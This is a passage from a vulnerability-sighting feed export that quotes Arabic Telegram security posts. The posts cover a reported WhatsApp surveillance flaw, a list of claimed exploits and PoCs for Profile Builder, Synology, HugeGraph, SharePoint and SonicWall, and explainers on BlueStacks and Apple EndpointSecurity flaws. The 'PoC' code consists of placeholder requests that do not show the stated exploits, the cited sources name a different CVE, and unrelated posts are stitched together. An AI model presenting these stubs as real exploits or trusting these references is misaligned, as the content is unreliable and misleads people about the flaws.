\u0627\u0644\u0645\u0646\u0635\u0627\u062a \u0627\u0644\u0627\u062c\u062a\u0645\u0627\u0639\u064a\u0629 \u0641\u064a \u0645\u064a\u0646\u0644\u0648 \u0628\u0627\u0631\u0643\u060c \u0643\u0627\u0644\u064a\u0641\u0648\u0631\u0646\u064a\u0627 (\u0627\u0644\u0623\u0646\u0627\u0636\u0648\u0644)\n23/5/2024-\u0622\u062e\u0631 \u062a\u062d\u062f\u064a\u062b: 23/5/202403:28 \u0645 (\u0628\u062a\u0648\u0642\u064a\u062a \u0645\u0643\u0629 \u0627\u0644\u0645\u0643\u0631\u0645\u0629)\n\u0646\u0628\u0647 \u0645\u0648\u0642\u0639 \u0625\u0646\u062a\u0631\u0633\u0628\u062a \u0627\u0644\u0623\u0645\u064a\u0631\u0643\u064a \u0625\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0645\u062c\u0647\u0648\u0644\u0629 \u0628\u062a\u0637\u0628\u064a\u0642 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u0645\u0643\u0646 \u0627\u0644\u062d\u0643\u0648\u0645\u0627\u062a \u0645\u0646 \u0645\u0639\u0631\u0641\u0629 \u0645\u0646 \u062a\u0631\u0627\u0633\u0644\u0647\u060c \u0648\u062d\u0630\u0631 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646 \u0641\u064a \u0634\u0631\u0643\u0629 \u0645\u064a\u062a\u0627 (\u0641\u064a\u0633\u0628\u0648\u0643) \u0645\u0646 
\u0623\u0646 \u0627\u0644\u062f\u0648\u0644 \u064a\u0645\u0643\u0646\u0647\u0627 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062f\u0631\u062f\u0634\u0627\u062a\u060c \u0648\u064a\u062e\u0634\u0649 \u0627\u0644\u0645\u0648\u0638\u0641\u0648\u0646 \u0623\u0646 \u062a\u0633\u062a\u063a\u0644 \u0625\u0633\u0631\u0627\u0626\u064a\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0646\u062a\u0642\u0627\u0621 \u0623\u0647\u062f\u0627\u0641 \u0627\u0644\u0627\u063a\u062a\u064a\u0627\u0644 \u0641\u064a \u063a\u0632\u0629.\n\n\u0648\u0630\u0643\u0631 \u0627\u0644\u0645\u0648\u0642\u0639 \u0623\u0646\u0647 \u0641\u064a \u0634\u0647\u0631 \u0645\u0627\u0631\u0633/\u0622\u0630\u0627\u0631\u060c \u0623\u0635\u062f\u0631 \u0641\u0631\u064a\u0642 \u0623\u0645\u0646 \u0648\u0627\u062a\u0633\u0627\u0628 \u062a\u062d\u0630\u064a\u0631\u0627 \u062f\u0627\u062e\u0644\u064a\u0627 \u0644\u0632\u0645\u0644\u0627\u0626\u0647 \u0628\u0623\u0646\u0647 \u0631\u063a\u0645 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u0642\u0648\u064a \u0644\u0644\u0628\u0631\u0646\u0627\u0645\u062c\u060c \u0641\u0642\u062f \u0638\u0644 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0639\u0631\u0636\u0629 \u0644\u0634\u0643\u0644 \u062e\u0637\u064a\u0631 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629.\n\n\u0648\u0648\u0641\u0642\u0627 \u0644\u062a\u0642\u064a\u064a\u0645 \u0627\u0644\u062a\u0647\u062f\u064a\u062f \u0627\u0644\u0630\u064a \u0644\u0645 \u064a\u064f\u0628\u0644\u063a \u0639\u0646\u0647 \u0645\u0633\u0628\u0642\u0627\u060c \u0648\u062d\u0635\u0644 \u0639\u0644\u064a\u0647 \u0627\u0644\u0645\u0648\u0642\u0639\u060c \u0641\u0625\u0646 \u0645\u062d\u062a\u0648\u064a\u0627\u062a \u0627\u0644\u0645\u062d\u0627\u062f\u062b\u0627\u062a \u0628\u064a\u0646 \u0645\u0633\u062a\u062e\u062f\u0645\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642 
\u0627\u0644\u0628\u0627\u0644\u063a \u0639\u062f\u062f\u0647\u0645 2 \u0645\u0644\u064a\u0627\u0631 \u0645\u0633\u062a\u062e\u062f\u0645 \u062a\u0638\u0644 \u0622\u0645\u0646\u0629\u060c \u0644\u0643\u0646 \u0627\u0644\u062f\u0648\u0627\u0626\u0631 \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629\u060c \u0643\u0645\u0627 \u0643\u062a\u0628 \u0627\u0644\u0645\u0647\u0646\u062f\u0633\u0648\u0646\u060c \u0643\u0627\u0646\u062a \"\u062a\u062a\u062c\u0627\u0648\u0632 \u062a\u0634\u0641\u064a\u0631\u0646\u0627\" \u0644\u0645\u0639\u0631\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0630\u064a\u0646 \u064a\u062a\u0648\u0627\u0635\u0644\u0648\u0646 \u0645\u0639 \u0628\u0639\u0636\u0647\u0645 \u0627\u0644\u0628\u0639\u0636\u060c \u0648\u0639\u0636\u0648\u064a\u0629 \u0627\u0644\u0645\u062c\u0645\u0648\u0639\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629\u060c \u0648\u0631\u0628\u0645\u0627 \u062d\u062a\u0649 \u0645\u0648\u0627\u0642\u0639\u0647\u0645. \u0648\u062d\u062b \u0627\u0644\u062a\u0642\u064a\u064a\u0645 \u0639\u0644\u0649 \u0623\u0646 \u064a\u062e\u0641\u0641 \u0648\u0627\u062a\u0633\u0627\u0628 \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u0633\u062a\u0645\u0631 \u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u0641 \u0641\u064a \u062a\u062d\u0644\u064a\u0644 \u062d\u0631\u0643\u0629 \u0627\u0644\u0645\u0631\u0648\u0631 \u0627\u0644\u062a\u064a \u062a\u0645\u0643\u0646 \u0627\u0644\u062f\u0648\u0644 \u0645\u0646 \u062a\u062d\u062f\u064a\u062f \u0645\u0646 \u064a\u062a\u062d\u062f\u062b \u0625\u0644\u0649 \u0645\u0646.\n\nThe Smart Shadow:\n\u2206 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0627\u062a \u0648\u0625\u062b\u0628\u0627\u062a\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoCs) \u0644\u0644\u062b\u063a\u0631\u0627\u062a \n\n\u2206 1. 
\u062b\u063a\u0631\u0629 Profile Builder \u0648 Profile Builder Pro\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0627\u0644\u0645\u0633\u0624\u0648\u0644 \u062f\u0648\u0646 \u0627\u0644\u062d\u0627\u062c\u0629 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0648\u0642\u0639.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0644\u0627 \u064a\u0648\u062c\u062f \u0625\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645 \u0645\u062d\u062f\u062f \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\u060c \u0648\u0644\u0643\u0646 \u062a\u0642\u0627\u0631\u064a\u0631 WPScan \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0633\u064a\u0646\u0627\u0631\u064a\u0648\u0647\u0627\u062a \u062a\u0641\u0635\u064a\u0644\u064a\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    import requests\n\n    url = \"http://target-website/wp-login.php\"\n    payload = {\n        \"username\": \"attacker_username\",\n        \"password\": \"attacker_password\"\n    }\n    response = requests.post(url, data=payload)\n    print(response.text)\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0646\u0633\u062e\u0629 \u0643\u0645\u0627 \u064a\u0646\u0635\u062d \u0627\u0644\u0645\u0637\u0648\u0631\u0648\u0646.\n\n\u2206 2. 
\u062b\u063a\u0631\u0629 \u0643\u0627\u0645\u064a\u0631\u0627\u062a Synology BC500 IP\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062a\u0633\u0645\u062d \u0628\u0627\u0644\u062a\u0628\u062f\u064a\u0644 \u0645\u0646 WAN \u0625\u0644\u0649 LAN\u060c \u062a\u0645 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0641\u064a \u0645\u0633\u0627\u0628\u0642\u0629 Pwn2Own Toronto.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u062a Claroty \u062a\u0641\u0627\u0635\u064a\u0644 \u0641\u0646\u064a\u0629 \u062d\u0648\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    import requests\n\n    url = \"http://target-camera-ip/api/exploit\"\n    payload = {\"command\": \"switch_network\"}\n    response = requests.post(url, json=payload)\n    print(response.text)\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u062d\u062f\u064a\u062b \u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u0643\u0627\u0645\u064a\u0631\u0627 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631.\n\n#### 3. 
\u062b\u063a\u0631\u0629 Apache HugeGraph (CVE-2024-27348)\n- \u062e\u0637\u0648\u0631\u0629: 9.8/10\n- \u0627\u0644\u0648\u0635\u0641: \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u062e\u0648\u0627\u062f\u0645 \u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0645\u062a\u0627\u062d \u0639\u0644\u0649 GitHub \u0643\u0645\u0627 \u0630\u0643\u0631.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    import requests\n\n    url = \"http://target-hugegraph-server\"\n    payload = {\"exploit\": \"malicious_code_here\"}\n    response = requests.post(url, json=payload)\n    print(response.text)\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d \u0627\u0644\u0623\u0645\u0646\u064a \u0627\u0644\u0635\u0627\u062f\u0631 \u0641\u064a \u0623\u0628\u0631\u064a\u0644.\n\n\u2206 4. 
\u062b\u063a\u0631\u0627\u062a Microsoft SharePoint (CVE-2024-38023\u060c CVE-2024-38024\u060c CVE-2024-38094)\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u062b\u063a\u0631\u0627\u062a \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u0646\u0634\u0631\u0647 Nguyen Giang.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    # \u0647\u0630\u0627 \u0645\u062b\u0627\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u061b \u0642\u062f \u064a\u062e\u062a\u0644\u0641 \u0631\u0645\u0632 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0641\u0639\u0644\u064a.\n    Invoke-WebRequest -Uri \"http://target-sharepoint-server/exploit\" -Method GET\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u0642\u062f\u0645\u0629 \u0645\u0646 Microsoft.\n\n\u2206 5. 
\u062b\u063a\u0631\u0629 SonicWall SMA100\n- \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0641\u064a \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\u0645.\n- \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645: \u062a\u0645 \u0646\u0634\u0631\u0647 \u0628\u0648\u0627\u0633\u0637\u0629 SSD.\n- \u0645\u062b\u0627\u0644 \u0644\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645:\n   \n    curl -k -X POST https://target-sma100-device -d \"exploit_payload_here\"\n    \n- \u0627\u0644\u062a\u062e\u0641\u064a\u0641: \u0625\u0632\u0627\u0644\u0629 \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0643\u0644\u0627\u0633\u064a\u0643\u064a \u0648\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629.\n\n\u2206 \u0627\u0644\u062a\u0648\u0635\u064a\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629\n- \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a: \u062a\u062d\u062f\u064a\u062b \u062c\u0645\u064a\u0639 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0648\u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u0627\u0644\u062b\u0627\u0628\u062a\u0629 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a.\n- \u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0645\u062b\u0644 Nessus \u0623\u0648 OpenVAS \u0644\u0641\u062d\u0635 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629.\n- \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629: \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u0638\u0645\u0629 
\u0627\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0633\u0644\u0644 \u0648\u0645\u0646\u0639 \u0627\u0644\u062a\u0633\u0644\u0644 \u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0648\u0645\u0646\u0639 \u0645\u062d\u0627\u0648\u0644\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\n\n\u2206 \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3352)\n- [Security-Database](https://www.security-database.com/detail.php?alert=CVE-2023-3352)\n- [Vulners](https://vulners.com/cve/CVE-2023-3352)\n\n## \u0634\u0631\u062d \u0648\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2024-33352: \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a BlueStacks \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\n\n### \u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/20dfd601-d1e6-4bf1-929e-4d6c623f6efe/export</guid>
      <pubDate>Fri, 13 Dec 2024 19:00:22 +0000</pubDate>
    </item>
    <item>
      <title>51ca8f8b-aeb4-43c0-b549-e8a1f5fad200</title>
      <link>https://vulnerability.circl.lu/sighting/51ca8f8b-aeb4-43c0-b549-e8a1f5fad200/export</link>
      <description>{"uuid": "51ca8f8b-aeb4-43c0-b549-e8a1f5fad200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "https://t.me/cyber_hsecurity/1613", "content": "3. \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a:\n   - \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0645\u0646 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0625\u0644\u0649 \u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0636\u064a\u0641 (host operating system). \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631.\n\n\u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u060c \u064a\u062c\u0628 \u0627\u062a\u0628\u0627\u0639 \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. 
\u062a\u062d\u062f\u064a\u062b BlueStacks:\n   - \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0644\u0627\u0632\u0645\u0629. \u062a\u0642\u0648\u0645 \u0627\u0644\u0634\u0631\u0643\u0629 \u0627\u0644\u0645\u0637\u0648\u0631\u0629 \u0628\u0625\u0635\u062f\u0627\u0631 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u062f\u0648\u0631\u064a\u0629 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n\n2. \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a:\n   - \u0627\u0633\u062a\u062e\u062f\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0627\u0644\u0645\u062d\u062f\u062b\u0629 \u0644\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0636\u0627\u0631\u0629 \u0648\u0645\u0646\u0639\u0647\u0627 \u0645\u0646 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u062f\u0627\u062e\u0644 BlueStacks.\n\n3. \u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629:\n   - \u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0641\u0642\u0637 \u0645\u0646 \u0645\u062a\u0627\u062c\u0631 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0645\u0648\u062b\u0648\u0642\u0629 \u0645\u062b\u0644 Google Play. 
\u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0639\u0631\u0648\u0641\u0629 \u0623\u0648 \u0645\u0634\u0628\u0648\u0647\u0629.\n\n\u0627\u0644\u062e\u0644\u0627\u0635\u0629:\n\n\u062a\u0639\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062e\u0637\u064a\u0631\u064b\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u062a\u063a\u0644\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0623\u0646 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u0628\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u062a\u062e\u0630 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643\u060c \u0645\u062b\u0644 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0648\u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n\n\nhttps://github.com/mmiszczyk/CVE-2024-33352\n\nABO TURAB:\n### CVE-2019-8805: \u062a\u0635\u0639\u064a\u062f 
\u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity\n\n#### \u0645\u0642\u062f\u0645\u0629:\n\u0627\u0644\u0645\u0642\u0627\u0644\u0629 \u062a\u062a\u0646\u0627\u0648\u0644 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0634\u0631\u0643\u0629 Apple\u060c \u062a\u064f\u0639\u0631\u0641 \u0628\u0627\u0633\u0645 CVE-2019-8805. \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644 \u0627\u0644\u0646\u0638\u0627\u0645.\n\n#### \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629:\n\n1. 
\u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 (CVE-2019-8805):\n   - \u062a\u0639\u0631\u064a\u0641: CVE-2019-8805 \u0647\u064a \u062b\u063a\u0631\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0646\u0638\u0627\u0645 macOS\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a.\n   - \u0643\u064a\u0641 \u062a\u0639\u0645\u0644: \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u062a\u062c\u0627\u0648\u0632 \u0642\u064a\u0648\u062f \u0627\u0644\u0623\u0645\u0627\u0646 \u0648\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647\u0645 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0633\u0624\u0648\u0644.\n\n2. \u0643\u064a\u0641 \u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629:\n   - \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u062d\u0644\u064a: \u064a\u062c\u0628 \u0623\u0646 \u064a\u0643\u0648\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u0627\u062f\u0631\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. 
